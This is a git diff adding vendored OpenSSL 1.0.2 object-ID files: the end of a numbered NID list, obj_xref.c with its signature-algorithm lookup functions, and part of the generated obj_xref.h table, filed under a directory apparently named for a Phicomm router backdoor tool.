+id_it_caProtEncCert		298
+id_it_signKeyPairTypes		299
+id_it_encKeyPairTypes		300
+id_it_preferredSymmAlg		301
+id_it_caKeyUpdateInfo		302
+id_it_currentCRL		303
+id_it_unsupportedOIDs		304
+id_it_subscriptionRequest		305
+id_it_subscriptionResponse		306
+id_it_keyPairParamReq		307
+id_it_keyPairParamRep		308
+id_it_revPassphrase		309
+id_it_implicitConfirm		310
+id_it_confirmWaitTime		311
+id_it_origPKIMessage		312
+id_regCtrl		313
+id_regInfo		314
+id_regCtrl_regToken		315
+id_regCtrl_authenticator		316
+id_regCtrl_pkiPublicationInfo		317
+id_regCtrl_pkiArchiveOptions		318
+id_regCtrl_oldCertID		319
+id_regCtrl_protocolEncrKey		320
+id_regInfo_utf8Pairs		321
+id_regInfo_certReq		322
+id_alg_des40		323
+id_alg_noSignature		324
+id_alg_dh_sig_hmac_sha1		325
+id_alg_dh_pop		326
+id_cmc_statusInfo		327
+id_cmc_identification		328
+id_cmc_identityProof		329
+id_cmc_dataReturn		330
+id_cmc_transactionId		331
+id_cmc_senderNonce		332
+id_cmc_recipientNonce		333
+id_cmc_addExtensions		334
+id_cmc_encryptedPOP		335
+id_cmc_decryptedPOP		336
+id_cmc_lraPOPWitness		337
+id_cmc_getCert		338
+id_cmc_getCRL		339
+id_cmc_revokeRequest		340
+id_cmc_regInfo		341
+id_cmc_responseInfo		342
+id_cmc_queryPending		343
+id_cmc_popLinkRandom		344
+id_cmc_popLinkWitness		345
+id_cmc_confirmCertAcceptance		346
+id_on_personalData		347
+id_pda_dateOfBirth		348
+id_pda_placeOfBirth		349
+id_pda_pseudonym		350
+id_pda_gender		351
+id_pda_countryOfCitizenship		352
+id_pda_countryOfResidence		353
+id_aca_authenticationInfo		354
+id_aca_accessIdentity		355
+id_aca_chargingIdentity		356
+id_aca_group		357
+id_aca_role		358
+id_qcs_pkixQCSyntax_v1		359
+id_cct_crs		360
+id_cct_PKIData		361
+id_cct_PKIResponse		362
+ad_timeStamping		363
+ad_dvcs		364
+id_pkix_OCSP_basic		365
+id_pkix_OCSP_Nonce		366
+id_pkix_OCSP_CrlID		367
+id_pkix_OCSP_acceptableResponses		368
+id_pkix_OCSP_noCheck		369
+id_pkix_OCSP_archiveCutoff		370
+id_pkix_OCSP_serviceLocator		371
+id_pkix_OCSP_extendedStatus		372
+id_pkix_OCSP_valid		373
+id_pkix_OCSP_path		374
+id_pkix_OCSP_trustRoot		375
+algorithm		376
+rsaSignature		377
+X500algorithms		378
+org		379
+dod		380
+iana		381
+Directory		382
+Management		383
+Experimental		384
+Private		385
+Security		386
+SNMPv2		387
+Mail		388
+Enterprises		389
+dcObject		390
+domainComponent		391
+Domain		392
+joint_iso_ccitt		393
+selected_attribute_types		394
+clearance		395
+md4WithRSAEncryption		396
+ac_proxying		397
+sinfo_access		398
+id_aca_encAttrs		399
+role		400
+policy_constraints		401
+target_information		402
+no_rev_avail		403
+ccitt		404
+ansi_X9_62		405
+X9_62_prime_field		406
+X9_62_characteristic_two_field		407
+X9_62_id_ecPublicKey		408
+X9_62_prime192v1		409
+X9_62_prime192v2		410
+X9_62_prime192v3		411
+X9_62_prime239v1		412
+X9_62_prime239v2		413
+X9_62_prime239v3		414
+X9_62_prime256v1		415
+ecdsa_with_SHA1		416
+ms_csp_name		417
+aes_128_ecb		418
+aes_128_cbc		419
+aes_128_ofb128		420
+aes_128_cfb128		421
+aes_192_ecb		422
+aes_192_cbc		423
+aes_192_ofb128		424
+aes_192_cfb128		425
+aes_256_ecb		426
+aes_256_cbc		427
+aes_256_ofb128		428
+aes_256_cfb128		429
+hold_instruction_code		430
+hold_instruction_none		431
+hold_instruction_call_issuer		432
+hold_instruction_reject		433
+data		434
+pss		435
+ucl		436
+pilot		437
+pilotAttributeType		438
+pilotAttributeSyntax		439
+pilotObjectClass		440
+pilotGroups		441
+iA5StringSyntax		442
+caseIgnoreIA5StringSyntax		443
+pilotObject		444
+pilotPerson		445
+account		446
+document		447
+room		448
+documentSeries		449
+rFC822localPart		450
+dNSDomain		451
+domainRelatedObject		452
+friendlyCountry		453
+simpleSecurityObject		454
+pilotOrganization		455
+pilotDSA		456
+qualityLabelledData		457
+userId		458
+textEncodedORAddress		459
+rfc822Mailbox		460
+info		461
+favouriteDrink		462
+roomNumber		463
+photo		464
+userClass		465
+host		466
+manager		467
+documentIdentifier		468
+documentTitle		469
+documentVersion		470
+documentAuthor		471
+documentLocation		472
+homeTelephoneNumber		473
+secretary		474
+otherMailbox		475
+lastModifiedTime		476
+lastModifiedBy		477
+aRecord		478
+pilotAttributeType27		479
+mXRecord		480
+nSRecord		481
+sOARecord		482
+cNAMERecord		483
+associatedDomain		484
+associatedName		485
+homePostalAddress		486
+personalTitle		487
+mobileTelephoneNumber		488
+pagerTelephoneNumber		489
+friendlyCountryName		490
+organizationalStatus		491
+janetMailbox		492
+mailPreferenceOption		493
+buildingName		494
+dSAQuality		495
+singleLevelQuality		496
+subtreeMinimumQuality		497
+subtreeMaximumQuality		498
+personalSignature		499
+dITRedirect		500
+audio		501
+documentPublisher		502
+x500UniqueIdentifier		503
+mime_mhs		504
+mime_mhs_headings		505
+mime_mhs_bodies		506
+id_hex_partial_message		507
+id_hex_multipart_message		508
+generationQualifier		509
+pseudonym		510
+InternationalRA		511
+id_set		512
+set_ctype		513
+set_msgExt		514
+set_attr		515
+set_policy		516
+set_certExt		517
+set_brand		518
+setct_PANData		519
+setct_PANToken		520
+setct_PANOnly		521
+setct_OIData		522
+setct_PI		523
+setct_PIData		524
+setct_PIDataUnsigned		525
+setct_HODInput		526
+setct_AuthResBaggage		527
+setct_AuthRevReqBaggage		528
+setct_AuthRevResBaggage		529
+setct_CapTokenSeq		530
+setct_PInitResData		531
+setct_PI_TBS		532
+setct_PResData		533
+setct_AuthReqTBS		534
+setct_AuthResTBS		535
+setct_AuthResTBSX		536
+setct_AuthTokenTBS		537
+setct_CapTokenData		538
+setct_CapTokenTBS		539
+setct_AcqCardCodeMsg		540
+setct_AuthRevReqTBS		541
+setct_AuthRevResData		542
+setct_AuthRevResTBS		543
+setct_CapReqTBS		544
+setct_CapReqTBSX		545
+setct_CapResData		546
+setct_CapRevReqTBS		547
+setct_CapRevReqTBSX		548
+setct_CapRevResData		549
+setct_CredReqTBS		550
+setct_CredReqTBSX		551
+setct_CredResData		552
+setct_CredRevReqTBS		553
+setct_CredRevReqTBSX		554
+setct_CredRevResData		555
+setct_PCertReqData		556
+setct_PCertResTBS		557
+setct_BatchAdminReqData		558
+setct_BatchAdminResData		559
+setct_CardCInitResTBS		560
+setct_MeAqCInitResTBS		561
+setct_RegFormResTBS		562
+setct_CertReqData		563
+setct_CertReqTBS		564
+setct_CertResData		565
+setct_CertInqReqTBS		566
+setct_ErrorTBS		567
+setct_PIDualSignedTBE		568
+setct_PIUnsignedTBE		569
+setct_AuthReqTBE		570
+setct_AuthResTBE		571
+setct_AuthResTBEX		572
+setct_AuthTokenTBE		573
+setct_CapTokenTBE		574
+setct_CapTokenTBEX		575
+setct_AcqCardCodeMsgTBE		576
+setct_AuthRevReqTBE		577
+setct_AuthRevResTBE		578
+setct_AuthRevResTBEB		579
+setct_CapReqTBE		580
+setct_CapReqTBEX		581
+setct_CapResTBE		582
+setct_CapRevReqTBE		583
+setct_CapRevReqTBEX		584
+setct_CapRevResTBE		585
+setct_CredReqTBE		586
+setct_CredReqTBEX		587
+setct_CredResTBE		588
+setct_CredRevReqTBE		589
+setct_CredRevReqTBEX		590
+setct_CredRevResTBE		591
+setct_BatchAdminReqTBE		592
+setct_BatchAdminResTBE		593
+setct_RegFormReqTBE		594
+setct_CertReqTBE		595
+setct_CertReqTBEX		596
+setct_CertResTBE		597
+setct_CRLNotificationTBS		598
+setct_CRLNotificationResTBS		599
+setct_BCIDistributionTBS		600
+setext_genCrypt		601
+setext_miAuth		602
+setext_pinSecure		603
+setext_pinAny		604
+setext_track2		605
+setext_cv		606
+set_policy_root		607
+setCext_hashedRoot		608
+setCext_certType		609
+setCext_merchData		610
+setCext_cCertRequired		611
+setCext_tunneling		612
+setCext_setExt		613
+setCext_setQualf		614
+setCext_PGWYcapabilities		615
+setCext_TokenIdentifier		616
+setCext_Track2Data		617
+setCext_TokenType		618
+setCext_IssuerCapabilities		619
+setAttr_Cert		620
+setAttr_PGWYcap		621
+setAttr_TokenType		622
+setAttr_IssCap		623
+set_rootKeyThumb		624
+set_addPolicy		625
+setAttr_Token_EMV		626
+setAttr_Token_B0Prime		627
+setAttr_IssCap_CVM		628
+setAttr_IssCap_T2		629
+setAttr_IssCap_Sig		630
+setAttr_GenCryptgrm		631
+setAttr_T2Enc		632
+setAttr_T2cleartxt		633
+setAttr_TokICCsig		634
+setAttr_SecDevSig		635
+set_brand_IATA_ATA		636
+set_brand_Diners		637
+set_brand_AmericanExpress		638
+set_brand_JCB		639
+set_brand_Visa		640
+set_brand_MasterCard		641
+set_brand_Novus		642
+des_cdmf		643
+rsaOAEPEncryptionSET		644
+itu_t		645
+joint_iso_itu_t		646
+international_organizations		647
+ms_smartcard_login		648
+ms_upn		649
+aes_128_cfb1		650
+aes_192_cfb1		651
+aes_256_cfb1		652
+aes_128_cfb8		653
+aes_192_cfb8		654
+aes_256_cfb8		655
+des_cfb1		656
+des_cfb8		657
+des_ede3_cfb1		658
+des_ede3_cfb8		659
+streetAddress		660
+postalCode		661
+id_ppl		662
+proxyCertInfo		663
+id_ppl_anyLanguage		664
+id_ppl_inheritAll		665
+name_constraints		666
+Independent		667
+sha256WithRSAEncryption		668
+sha384WithRSAEncryption		669
+sha512WithRSAEncryption		670
+sha224WithRSAEncryption		671
+sha256		672
+sha384		673
+sha512		674
+sha224		675
+identified_organization		676
+certicom_arc		677
+wap		678
+wap_wsg		679
+X9_62_id_characteristic_two_basis		680
+X9_62_onBasis		681
+X9_62_tpBasis		682
+X9_62_ppBasis		683
+X9_62_c2pnb163v1		684
+X9_62_c2pnb163v2		685
+X9_62_c2pnb163v3		686
+X9_62_c2pnb176v1		687
+X9_62_c2tnb191v1		688
+X9_62_c2tnb191v2		689
+X9_62_c2tnb191v3		690
+X9_62_c2onb191v4		691
+X9_62_c2onb191v5		692
+X9_62_c2pnb208w1		693
+X9_62_c2tnb239v1		694
+X9_62_c2tnb239v2		695
+X9_62_c2tnb239v3		696
+X9_62_c2onb239v4		697
+X9_62_c2onb239v5		698
+X9_62_c2pnb272w1		699
+X9_62_c2pnb304w1		700
+X9_62_c2tnb359v1		701
+X9_62_c2pnb368w1		702
+X9_62_c2tnb431r1		703
+secp112r1		704
+secp112r2		705
+secp128r1		706
+secp128r2		707
+secp160k1		708
+secp160r1		709
+secp160r2		710
+secp192k1		711
+secp224k1		712
+secp224r1		713
+secp256k1		714
+secp384r1		715
+secp521r1		716
+sect113r1		717
+sect113r2		718
+sect131r1		719
+sect131r2		720
+sect163k1		721
+sect163r1		722
+sect163r2		723
+sect193r1		724
+sect193r2		725
+sect233k1		726
+sect233r1		727
+sect239k1		728
+sect283k1		729
+sect283r1		730
+sect409k1		731
+sect409r1		732
+sect571k1		733
+sect571r1		734
+wap_wsg_idm_ecid_wtls1		735
+wap_wsg_idm_ecid_wtls3		736
+wap_wsg_idm_ecid_wtls4		737
+wap_wsg_idm_ecid_wtls5		738
+wap_wsg_idm_ecid_wtls6		739
+wap_wsg_idm_ecid_wtls7		740
+wap_wsg_idm_ecid_wtls8		741
+wap_wsg_idm_ecid_wtls9		742
+wap_wsg_idm_ecid_wtls10		743
+wap_wsg_idm_ecid_wtls11		744
+wap_wsg_idm_ecid_wtls12		745
+any_policy		746
+policy_mappings		747
+inhibit_any_policy		748
+ipsec3		749
+ipsec4		750
+camellia_128_cbc		751
+camellia_192_cbc		752
+camellia_256_cbc		753
+camellia_128_ecb		754
+camellia_192_ecb		755
+camellia_256_ecb		756
+camellia_128_cfb128		757
+camellia_192_cfb128		758
+camellia_256_cfb128		759
+camellia_128_cfb1		760
+camellia_192_cfb1		761
+camellia_256_cfb1		762
+camellia_128_cfb8		763
+camellia_192_cfb8		764
+camellia_256_cfb8		765
+camellia_128_ofb128		766
+camellia_192_ofb128		767
+camellia_256_ofb128		768
+subject_directory_attributes		769
+issuing_distribution_point		770
+certificate_issuer		771
+korea		772
+kisa		773
+kftc		774
+npki_alg		775
+seed_ecb		776
+seed_cbc		777
+seed_ofb128		778
+seed_cfb128		779
+hmac_md5		780
+hmac_sha1		781
+id_PasswordBasedMAC		782
+id_DHBasedMac		783
+id_it_suppLangTags		784
+caRepository		785
+id_smime_ct_compressedData		786
+id_ct_asciiTextWithCRLF		787
+id_aes128_wrap		788
+id_aes192_wrap		789
+id_aes256_wrap		790
+ecdsa_with_Recommended		791
+ecdsa_with_Specified		792
+ecdsa_with_SHA224		793
+ecdsa_with_SHA256		794
+ecdsa_with_SHA384		795
+ecdsa_with_SHA512		796
+hmacWithMD5		797
+hmacWithSHA224		798
+hmacWithSHA256		799
+hmacWithSHA384		800
+hmacWithSHA512		801
+dsa_with_SHA224		802
+dsa_with_SHA256		803
+whirlpool		804
+cryptopro		805
+cryptocom		806
+id_GostR3411_94_with_GostR3410_2001		807
+id_GostR3411_94_with_GostR3410_94		808
+id_GostR3411_94		809
+id_HMACGostR3411_94		810
+id_GostR3410_2001		811
+id_GostR3410_94		812
+id_Gost28147_89		813
+gost89_cnt		814
+id_Gost28147_89_MAC		815
+id_GostR3411_94_prf		816
+id_GostR3410_2001DH		817
+id_GostR3410_94DH		818
+id_Gost28147_89_CryptoPro_KeyMeshing		819
+id_Gost28147_89_None_KeyMeshing		820
+id_GostR3411_94_TestParamSet		821
+id_GostR3411_94_CryptoProParamSet		822
+id_Gost28147_89_TestParamSet		823
+id_Gost28147_89_CryptoPro_A_ParamSet		824
+id_Gost28147_89_CryptoPro_B_ParamSet		825
+id_Gost28147_89_CryptoPro_C_ParamSet		826
+id_Gost28147_89_CryptoPro_D_ParamSet		827
+id_Gost28147_89_CryptoPro_Oscar_1_1_ParamSet		828
+id_Gost28147_89_CryptoPro_Oscar_1_0_ParamSet		829
+id_Gost28147_89_CryptoPro_RIC_1_ParamSet		830
+id_GostR3410_94_TestParamSet		831
+id_GostR3410_94_CryptoPro_A_ParamSet		832
+id_GostR3410_94_CryptoPro_B_ParamSet		833
+id_GostR3410_94_CryptoPro_C_ParamSet		834
+id_GostR3410_94_CryptoPro_D_ParamSet		835
+id_GostR3410_94_CryptoPro_XchA_ParamSet		836
+id_GostR3410_94_CryptoPro_XchB_ParamSet		837
+id_GostR3410_94_CryptoPro_XchC_ParamSet		838
+id_GostR3410_2001_TestParamSet		839
+id_GostR3410_2001_CryptoPro_A_ParamSet		840
+id_GostR3410_2001_CryptoPro_B_ParamSet		841
+id_GostR3410_2001_CryptoPro_C_ParamSet		842
+id_GostR3410_2001_CryptoPro_XchA_ParamSet		843
+id_GostR3410_2001_CryptoPro_XchB_ParamSet		844
+id_GostR3410_94_a		845
+id_GostR3410_94_aBis		846
+id_GostR3410_94_b		847
+id_GostR3410_94_bBis		848
+id_Gost28147_89_cc		849
+id_GostR3410_94_cc		850
+id_GostR3410_2001_cc		851
+id_GostR3411_94_with_GostR3410_94_cc		852
+id_GostR3411_94_with_GostR3410_2001_cc		853
+id_GostR3410_2001_ParamSet_cc		854
+hmac		855
+LocalKeySet		856
+freshest_crl		857
+id_on_permanentIdentifier		858
+searchGuide		859
+businessCategory		860
+postalAddress		861
+postOfficeBox		862
+physicalDeliveryOfficeName		863
+telephoneNumber		864
+telexNumber		865
+teletexTerminalIdentifier		866
+facsimileTelephoneNumber		867
+x121Address		868
+internationaliSDNNumber		869
+registeredAddress		870
+destinationIndicator		871
+preferredDeliveryMethod		872
+presentationAddress		873
+supportedApplicationContext		874
+member		875
+owner		876
+roleOccupant		877
+seeAlso		878
+userPassword		879
+userCertificate		880
+cACertificate		881
+authorityRevocationList		882
+certificateRevocationList		883
+crossCertificatePair		884
+enhancedSearchGuide		885
+protocolInformation		886
+distinguishedName		887
+uniqueMember		888
+houseIdentifier		889
+supportedAlgorithms		890
+deltaRevocationList		891
+dmdName		892
+id_alg_PWRI_KEK		893
+cmac		894
+aes_128_gcm		895
+aes_128_ccm		896
+id_aes128_wrap_pad		897
+aes_192_gcm		898
+aes_192_ccm		899
+id_aes192_wrap_pad		900
+aes_256_gcm		901
+aes_256_ccm		902
+id_aes256_wrap_pad		903
+aes_128_ctr		904
+aes_192_ctr		905
+aes_256_ctr		906
+id_camellia128_wrap		907
+id_camellia192_wrap		908
+id_camellia256_wrap		909
+anyExtendedKeyUsage		910
+mgf1		911
+rsassaPss		912
+aes_128_xts		913
+aes_256_xts		914
+rc4_hmac_md5		915
+aes_128_cbc_hmac_sha1		916
+aes_192_cbc_hmac_sha1		917
+aes_256_cbc_hmac_sha1		918
+rsaesOaep		919
+dhpublicnumber		920
+brainpoolP160r1		921
+brainpoolP160t1		922
+brainpoolP192r1		923
+brainpoolP192t1		924
+brainpoolP224r1		925
+brainpoolP224t1		926
+brainpoolP256r1		927
+brainpoolP256t1		928
+brainpoolP320r1		929
+brainpoolP320t1		930
+brainpoolP384r1		931
+brainpoolP384t1		932
+brainpoolP512r1		933
+brainpoolP512t1		934
+pSpecified		935
+dhSinglePass_stdDH_sha1kdf_scheme		936
+dhSinglePass_stdDH_sha224kdf_scheme		937
+dhSinglePass_stdDH_sha256kdf_scheme		938
+dhSinglePass_stdDH_sha384kdf_scheme		939
+dhSinglePass_stdDH_sha512kdf_scheme		940
+dhSinglePass_cofactorDH_sha1kdf_scheme		941
+dhSinglePass_cofactorDH_sha224kdf_scheme		942
+dhSinglePass_cofactorDH_sha256kdf_scheme		943
+dhSinglePass_cofactorDH_sha384kdf_scheme		944
+dhSinglePass_cofactorDH_sha512kdf_scheme		945
+dh_std_kdf		946
+dh_cofactor_kdf		947
+aes_128_cbc_hmac_sha256		948
+aes_192_cbc_hmac_sha256		949
+aes_256_cbc_hmac_sha256		950
+ct_precert_scts		951
+ct_precert_poison		952
+ct_precert_signer		953
+ct_cert_scts		954
+jurisdictionLocalityName		955
+jurisdictionStateOrProvinceName		956
+jurisdictionCountryName		957
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.c
new file mode 100644
index 0000000..97b305d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.c
@@ -0,0 +1,222 @@
+/* crypto/objects/obj_xref.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/objects.h>
+#include "obj_xref.h"
+
+DECLARE_STACK_OF(nid_triple)
+STACK_OF(nid_triple) *sig_app, *sigx_app;
+
+static int sig_cmp(const nid_triple *a, const nid_triple *b)
+{
+    return a->sign_id - b->sign_id;
+}
+
+DECLARE_OBJ_BSEARCH_CMP_FN(nid_triple, nid_triple, sig);
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(nid_triple, nid_triple, sig);
+
+static int sig_sk_cmp(const nid_triple *const *a, const nid_triple *const *b)
+{
+    return (*a)->sign_id - (*b)->sign_id;
+}
+
+DECLARE_OBJ_BSEARCH_CMP_FN(const nid_triple *, const nid_triple *, sigx);
+
+static int sigx_cmp(const nid_triple *const *a, const nid_triple *const *b)
+{
+    int ret;
+    ret = (*a)->hash_id - (*b)->hash_id;
+    if (ret)
+        return ret;
+    return (*a)->pkey_id - (*b)->pkey_id;
+}
+
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(const nid_triple *, const nid_triple *, sigx);
+
+int OBJ_find_sigid_algs(int signid, int *pdig_nid, int *ppkey_nid)
+{
+    nid_triple tmp;
+    const nid_triple *rv = NULL;
+    tmp.sign_id = signid;
+
+    if (sig_app) {
+        int idx = sk_nid_triple_find(sig_app, &tmp);
+        if (idx >= 0)
+            rv = sk_nid_triple_value(sig_app, idx);
+    }
+#ifndef OBJ_XREF_TEST2
+    if (rv == NULL) {
+        rv = OBJ_bsearch_sig(&tmp, sigoid_srt,
+                             sizeof(sigoid_srt) / sizeof(nid_triple));
+    }
+#endif
+    if (rv == NULL)
+        return 0;
+    if (pdig_nid)
+        *pdig_nid = rv->hash_id;
+    if (ppkey_nid)
+        *ppkey_nid = rv->pkey_id;
+    return 1;
+}
+
+int OBJ_find_sigid_by_algs(int *psignid, int dig_nid, int pkey_nid)
+{
+    nid_triple tmp;
+    const nid_triple *t = &tmp;
+    const nid_triple **rv = NULL;
+
+    tmp.hash_id = dig_nid;
+    tmp.pkey_id = pkey_nid;
+
+    if (sigx_app) {
+        int idx = sk_nid_triple_find(sigx_app, &tmp);
+        if (idx >= 0) {
+            t = sk_nid_triple_value(sigx_app, idx);
+            rv = &t;
+        }
+    }
+#ifndef OBJ_XREF_TEST2
+    if (rv == NULL) {
+        rv = OBJ_bsearch_sigx(&t, sigoid_srt_xref,
+                              sizeof(sigoid_srt_xref) / sizeof(nid_triple *)
+            );
+    }
+#endif
+    if (rv == NULL)
+        return 0;
+    if (psignid)
+        *psignid = (*rv)->sign_id;
+    return 1;
+}
+
+int OBJ_add_sigid(int signid, int dig_id, int pkey_id)
+{
+    nid_triple *ntr;
+    if (!sig_app)
+        sig_app = sk_nid_triple_new(sig_sk_cmp);
+    if (!sig_app)
+        return 0;
+    if (!sigx_app)
+        sigx_app = sk_nid_triple_new(sigx_cmp);
+    if (!sigx_app)
+        return 0;
+    ntr = OPENSSL_malloc(sizeof(int) * 3);
+    if (!ntr)
+        return 0;
+    ntr->sign_id = signid;
+    ntr->hash_id = dig_id;
+    ntr->pkey_id = pkey_id;
+
+    if (!sk_nid_triple_push(sig_app, ntr)) {
+        OPENSSL_free(ntr);
+        return 0;
+    }
+
+    if (!sk_nid_triple_push(sigx_app, ntr))
+        return 0;
+
+    sk_nid_triple_sort(sig_app);
+    sk_nid_triple_sort(sigx_app);
+
+    return 1;
+}
+
+static void sid_free(nid_triple *tt)
+{
+    OPENSSL_free(tt);
+}
+
+void OBJ_sigid_free(void)
+{
+    if (sig_app) {
+        sk_nid_triple_pop_free(sig_app, sid_free);
+        sig_app = NULL;
+    }
+    if (sigx_app) {
+        sk_nid_triple_free(sigx_app);
+        sigx_app = NULL;
+    }
+}
+
+#ifdef OBJ_XREF_TEST
+
+main()
+{
+    int n1, n2, n3;
+
+    int i, rv;
+# ifdef OBJ_XREF_TEST2
+    for (i = 0; i < sizeof(sigoid_srt) / sizeof(nid_triple); i++) {
+        OBJ_add_sigid(sigoid_srt[i][0], sigoid_srt[i][1], sigoid_srt[i][2]);
+    }
+# endif
+
+    for (i = 0; i < sizeof(sigoid_srt) / sizeof(nid_triple); i++) {
+        n1 = sigoid_srt[i][0];
+        rv = OBJ_find_sigid_algs(n1, &n2, &n3);
+        printf("Forward: %d, %s %s %s\n", rv,
+               OBJ_nid2ln(n1), OBJ_nid2ln(n2), OBJ_nid2ln(n3));
+        n1 = 0;
+        rv = OBJ_find_sigid_by_algs(&n1, n2, n3);
+        printf("Reverse: %d, %s %s %s\n", rv,
+               OBJ_nid2ln(n1), OBJ_nid2ln(n2), OBJ_nid2ln(n3));
+    }
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.h
new file mode 100644
index 0000000..433c96b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/objects/obj_xref.h
@@ -0,0 +1,94 @@
+/* AUTOGENERATED BY objxref.pl, DO NOT EDIT */
+
+typedef struct
+	{
+	int sign_id;
+	int hash_id;
+	int pkey_id;
+	} nid_triple;
+
+static const nid_triple sigoid_srt[] =
+	{
+	{NID_md2WithRSAEncryption, NID_md2, NID_rsaEncryption},
+	{NID_md5WithRSAEncryption, NID_md5, NID_rsaEncryption},
+	{NID_shaWithRSAEncryption, NID_sha, NID_rsaEncryption},
+	{NID_sha1WithRSAEncryption, NID_sha1, NID_rsaEncryption},
+	{NID_dsaWithSHA, NID_sha, NID_dsa},
+	{NID_dsaWithSHA1_2, NID_sha1, NID_dsa_2},
+	{NID_mdc2WithRSA, NID_mdc2, NID_rsaEncryption},
+	{NID_md5WithRSA, NID_md5, NID_rsa},
+	{NID_dsaWithSHA1, NID_sha1, NID_dsa},
+	{NID_sha1WithRSA, NID_sha1, NID_rsa},
+	{NID_ripemd160WithRSA, NID_ripemd160, NID_rsaEncryption},
+	{NID_md4WithRSAEncryption, NID_md4, NID_rsaEncryption},
+	{NID_ecdsa_with_SHA1, NID_sha1, NID_X9_62_id_ecPublicKey},
+	{NID_sha256WithRSAEncryption, NID_sha256, NID_rsaEncryption},
+	{NID_sha384WithRSAEncryption, NID_sha384, NID_rsaEncryption},
+	{NID_sha512WithRSAEncryption, NID_sha512, NID_rsaEncryption},
+	{NID_sha224WithRSAEncryption, NID_sha224, NID_rsaEncryption},
+	{NID_ecdsa_with_Recommended, NID_undef, NID_X9_62_id_ecPublicKey},
+	{NID_ecdsa_with_Specified, NID_undef, NID_X9_62_id_ecPublicKey},
+	{NID_ecdsa_with_SHA224, NID_sha224, NID_X9_62_id_ecPublicKey},
+	{NID_ecdsa_with_SHA256, NID_sha256, NID_X9_62_id_ecPublicKey},
+	{NID_ecdsa_with_SHA384, NID_sha384, NID_X9_62_id_ecPublicKey},
+	{NID_ecdsa_with_SHA512, NID_sha512, NID_X9_62_id_ecPublicKey},
+	{NID_dsa_with_SHA224, NID_sha224, NID_dsa},
+	{NID_dsa_with_SHA256, NID_sha256, NID_dsa},
+	{NID_id_GostR3411_94_with_GostR3410_2001, NID_id_GostR3411_94, NID_id_GostR3410_2001},
+	{NID_id_GostR3411_94_with_GostR3410_94, NID_id_GostR3411_94, NID_id_GostR3410_94},
+	{NID_id_GostR3411_94_with_GostR3410_94_cc, NID_id_GostR3411_94, NID_id_GostR3410_94_cc},
+	{NID_id_GostR3411_94_with_GostR3410_2001_cc, NID_id_GostR3411_94, NID_id_GostR3410_2001_cc},
+	{NID_rsassaPss, NID_undef, NID_rsaEncryption},
+	{NID_dhSinglePass_stdDH_sha1kdf_scheme, NID_sha1, NID_dh_std_kdf},
+	{NID_dhSinglePass_stdDH_sha224kdf_scheme, NID_sha224, NID_dh_std_kdf},
+	{NID_dhSinglePass_stdDH_sha256kdf_scheme, NID_sha256, NID_dh_std_kdf},
+	{NID_dhSinglePass_stdDH_sha384kdf_scheme, NID_sha384, NID_dh_std_kdf},
+	{NID_dhSinglePass_stdDH_sha512kdf_scheme, NID_sha512, NID_dh_std_kdf},
+	{NID_dhSinglePass_cofactorDH_sha1kdf_scheme, NID_sha1, NID_dh_cofactor_kdf},
+	{NID_dhSinglePass_cofactorDH_sha224kdf_scheme, NID_sha224, NID_dh_cofactor_kdf},
+	{NID_dhSinglePass_cofactorDH_sha256kdf_scheme, NID_sha256, NID_dh_cofactor_kdf},
+	{NID_dhSinglePass_cofactorDH_sha384kdf_scheme, NID_sha384, NID_dh_cofactor_kdf},
